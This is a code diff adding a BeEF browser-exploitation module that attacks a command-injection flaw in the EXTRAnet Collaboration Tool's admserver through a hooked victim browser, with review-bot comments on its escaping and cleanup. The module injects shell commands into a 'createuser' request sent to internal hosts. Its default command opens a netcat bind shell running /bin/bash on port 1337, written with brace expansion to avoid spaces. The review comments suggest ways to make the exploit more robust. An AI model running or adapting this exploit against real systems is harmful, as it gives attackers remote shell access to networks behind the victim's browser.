diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(extract_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
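Review bot: The quote escaping for `cmd` does not do what it intends: the Ruby replacement string `"\\\'"` is the two characters `\'`, which `gsub` treats as the post-match reference rather than a literal backslash-quote, so a `'` in `@cmd` is dropped and the tail of the command duplicated (worth confirming in irb), while a `\` or newline is not escaped at all and breaks the JS string literal. That break is a parse error in the whole `beef.execute` body, not a runtime exception, so the surrounding `try`/`catch` never sends its 'malformed payload' report. Emitting the value as a JSON string literal, `var cmd = <%= @cmd.to_json %>;`, escapes every JS metacharacter in one step, assuming the json library is loaded in the module's context. Separately, `cleanup = function() {...}` is assigned without `var`, making it a page global that another module defining `cleanup` can clobber, and `setTimeout("cleanup()", ...)` evaluates a string; passing the function directly, `setTimeout(function() { document.body.removeChild(extract_iframe_<%= @command_id %>); }, timeout*1000);`, removes both. `timeout` is also the only option left unvalidated, so a non-numeric value gives `NaN*1000` and the iframe is torn down immediately.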
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ extract_cmd_exec:
+ enable: true
+ category: "Exploits"
+ name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+ description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
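Review bot: The default `cmd` value `{netcat,-l,-p,1337,-e,/bin/bash}` in `self.options` encodes a workaround that the file never explains; a comment above the option such as `# bash brace expansion: admserver rejects spaces, so {a,b,c} expands to "a b c" on the target` would save the next reader the puzzle — I am inferring the reason from the option's own description, which only says spaces are unsupported. On style, `if not @datastore['result'].nil?` in `post_execute` is the un-idiomatic spelling; `unless @datastore['result'].nil?` is what Ruby readers expect, and the explicit `return [` in `self.options` can be dropped since the array literal is already the method's last expression. Keep the `.nil?` check rather than a bare truthiness test, because an empty-string result would otherwise be skipped where the current code saves it.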